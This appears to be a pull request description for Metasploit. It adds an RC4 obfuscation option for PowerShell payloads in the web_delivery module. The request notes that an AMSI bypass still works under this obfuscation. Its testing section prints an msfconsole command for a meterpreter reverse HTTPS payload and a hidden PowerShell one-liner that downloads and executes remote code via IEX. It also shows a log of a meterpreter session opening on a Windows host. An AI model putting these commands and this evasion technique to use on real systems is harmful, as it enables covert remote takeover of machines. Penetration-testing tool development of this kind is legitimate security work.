This options makes use of RC4 for obfuscating powershell payloads. See
https://github.com/rapid7/rex-powershell/pull/14.
Now that the PR in rex-powershell has been merged, I am submitting this
PR which provides the new option powershell::exec_rc4 to make use of the
functionality added by the other PR. It enables using unstaged payloads
in web_delivery and obfuscates everything with RC4.
At first I wanted to include an AMSI bypass, but the maintainers were
against it, as it is a rapidly moving target. However, please note that
I'm using the same idea in another project of mine
(https://github.com/AdrianVollmer/PowerHub) and Matt Graber's original
AMSI bypass still works when obfuscating each string with RC4.
For verification and testing, the following output shows the steps you
need to take (here all included in the command line). Obviously, LHOST
needs to be adjusted.
$ msfconsole -x 'use exploit/multi/script/web_delivery; set target 2; set payload windows/x64/meterpreter_reverse_https; set lhost 192.168.11.2; set powershell::exec_rc4 true; set uripath rc4; run'
[...]
15:43:34>192.168.11.2[0] exploit(multi/script/web_delivery) >
[*] [2019.10.26-15:43:34] Started HTTPS reverse handler on https://192.168.11.2:8443
[*] [2019.10.26-15:43:34] Using URL: http://0.0.0.0:8080/rc4
[*] [2019.10.26-15:43:34] Local IP: http://192.168.11.2:8080/rc4
[*] [2019.10.26-15:43:34] Server started.
[*] [2019.10.26-15:43:34] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://192.168.11.2:8080/rc4');
[*] [2019.10.26-15:43:37] 192.168.11.3 web_delivery - Delivering Payload (372601) bytes
[*] [2019.10.26-15:43:38] https://192.168.11.2:8443 handling request from 192.168.11.3; (UUID: rlscader) Redirecting stageless connection from /ZyJn03h_PH9FDUQPGLkIhww9tmyD1k4jPjMnjneqaASfzgzxsFJHS0VFH8s with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] [2019.10.26-15:43:38] https://192.168.11.2:8443 handling request from 192.168.11.3; (UUID: rlscader) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.11.2:8443 -> 192.168.11.3:49820) at 2019-10-26 15:43:38 +0200
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : SYSS-AVOLLMER-W
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : de_DE
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
Spencer McIntyre